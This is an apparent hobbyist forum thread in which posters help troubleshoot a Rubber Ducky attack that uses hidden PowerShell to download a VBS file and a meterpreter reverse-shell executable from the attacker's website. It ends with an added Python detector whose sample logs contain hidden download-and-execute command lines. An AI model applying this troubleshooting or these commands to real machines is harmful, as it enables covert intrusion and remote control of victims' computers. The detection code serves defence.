Escalating Privileges in Windows & Staged Reverse Shells [DID NOT WORK HELP]


So I literally just finished copying this tutorial ...

https://www.youtube.com/watch?v=fmRRX7-G4lc

And everything went smoothly... Apart from when I plugged in the duck... Nothing happened on my Kali MSF... No shells were caught?

I should first off mention that my target machine was actually a 64-bit Windows, so I had to change the msfvenom -a to x64 and change the payload to windows/x64/meterpreter/reverse_tcp...

But besides that everything went OK... So because the shell wasn't being caught, I decided to open up PowerShell myself, and manually type in the code that the ducky inject.bin is trying to run in PowerShell.... and I got this error...

So I think the reason nothing happens when I plug the duck in, is because in the background (because obviously it is commanded to be hidden in the inject.bin) this is happening... making MSF not catch a shell...

 

Please could anyone take a look at this and help me overcome this error please. I would be forever grateful! Thank you hak5 enthusiasts! <3

Link to post
3 minutes ago, Lord_KamOS said:

x86 should work just fine on x64

 

Oh really? So I can still go ahead and make the payload for a 32-bit computer (like in the video) and still run it on a 64-bit machine? OK, that is interesting. Thank you. I do know about 32-bit being cross compatible with 64, but not the other way around.

But besides that. Is there a reason that the ducky script, once opened up in powershell, is not actually pulling my payload (website.com/bob.exe) or my vbs file (website.com/ggg.txt - As made in the video) from my website?

(You also commented on my other help thread for the turtle. Thank you for being active and trying to help me with my endeavors.)

Link to post
56 minutes ago, nik321 said:

But besides that. Is there a reason that the ducky script, once opened up in powershell, is not actually pulling my payload (website.com/bob.exe) or my vbs file (website.com/ggg.txt - As made in the video) from my website?

I am not sure, and sadly I can't test it right now, but maybe you can look into the twinduck firmware. I find it more effective to just mount the SD card and run the payload from the duck itself.

 

Link to post
11 minutes ago, Lord_KamOS said:

I am not sure, and sadly I can't test it right now, but maybe you can look into the twinduck firmware. I find it more effective to just mount the SD card and run the payload from the duck itself.

 

This is something that also interested me! I would prefer to be able to host the payload on the pendrive as well as the inject.bin > I like the idea of it all being contained in itself. I will take a look at the twinduck firmware setup on YouTube. Thank you for this.

Link to post

OK, so I did a bit of googling, and it turns out the PowerShell commands in the inject.bin are not real commands.. Is this because there might have been an update since the making of that video, rendering those commands useless now?

Link to post
2 hours ago, ThoughtfulDev said:

The download command is right. The '%temp%/update.vbs is wrong.

You want to run update.vbs, right?

Try something like cd %temp%; ./update.vbs

Note the './'

I don't think it's supposed to run it, rather save it as that name, rather than ggg.txt (as shown in image)

Link to post
19 hours ago, nik321 said:

I don't think it's supposed to run it, rather save it as that name, rather than ggg.txt (as shown in image)

I know the DownloadFile command runs just fine (remove everything after the ;). The file should then be in your temp folder (named update.vbs).

The error is the line after the ';'.

This line tries to run the update.vbs located in the temp folder, but if you want to run a.exe in PowerShell you can't just type a.exe, you have to use ./a.exe (you understand my point?)

Link to post
22 hours ago, ThoughtfulDev said:

I know the DownloadFile command runs just fine (remove everything after the ;). The file should then be in your temp folder (named update.vbs).

The error is the line after the ';'.

This line tries to run the update.vbs located in the temp folder, but if you want to run a.exe in PowerShell you can't just type a.exe, you have to use ./a.exe (you understand my point?)

Aaaagh!! Thank you so much friend! I am going to try this out! Your help has been amazing and I thank you for trying to help me overcome this. Big thanks to you mate!

Link to post
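
From the defender's side, the behaviour discussed in this thread (a hidden PowerShell window that calls DownloadFile and writes a file into the temp folder) shows up in process-creation command lines. The following is an added example, not part of the original thread: the log records, host names and URLs are constructed, and it also matches Invoke-WebRequest and abbreviated -WindowStyle forms, which goes beyond the single command the posts discuss.

```python
import re

# Constructed process-creation records (the command-line field that Sysmon
# Event ID 1 or Security 4688 would carry). Hosts, URLs and paths are made up.
SAMPLE_EVENTS = [
    {"host": "ws-01", "cmdline":
        r"powershell -WindowStyle Hidden (New-Object System.Net.WebClient)"
        r".DownloadFile('http://website.example/ggg.txt','%temp%/update.vbs'); %temp%/update.vbs"},
    {"host": "ws-02", "cmdline": r"powershell -File C:\Scripts\backup.ps1"},
    {"host": "ws-03", "cmdline":
        r"powershell Invoke-WebRequest https://intranet.example/tool.msi -OutFile C:\Installers\tool.msi"},
    {"host": "ws-04", "cmdline":
        r"powershell -w hidden -c (New-Object Net.WebClient)"
        r".DownloadFile('http://website.example/bob.exe','C:\Users\u\AppData\Local\Temp\bob.exe')"},
]

# Each signal alone is common in admin work; the combination is what stands out.
SIGNALS = {
    # -w, -win, -WindowStyle ... followed by "hidden" (not the "-W" in Invoke-WebRequest)
    "hidden_window": re.compile(r"(?<![\w-])-w[a-z]*\s+hidden\b", re.I),
    # WebClient.DownloadFile(...) or the Invoke-WebRequest cmdlet
    "web_download": re.compile(r"\.DownloadFile\s*\(|\bInvoke-WebRequest\b", re.I),
    # A script or executable path under the user's temp folder, expanded or not
    "temp_payload_path": re.compile(
        r"(%temp%|\$env:temp|\\appdata\\local\\temp)[\\/][^\s'\";]+\.(vbs|js|exe|bat|ps1)\b", re.I),
}

def matched_signals(cmdline):
    """Return the names of all signals present in one command line."""
    return [name for name, rx in SIGNALS.items() if rx.search(cmdline)]

def detect(events, threshold=2):
    """Alert on events whose command line carries at least `threshold` signals."""
    alerts = []
    for ev in events:
        hits = matched_signals(ev["cmdline"])
        if len(hits) >= threshold:
            alerts.append((ev["host"], hits))
    return alerts

if __name__ == "__main__":
    for host, hits in detect(SAMPLE_EVENTS):
        print(f"ALERT {host}: {', '.join(hits)}")
```
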
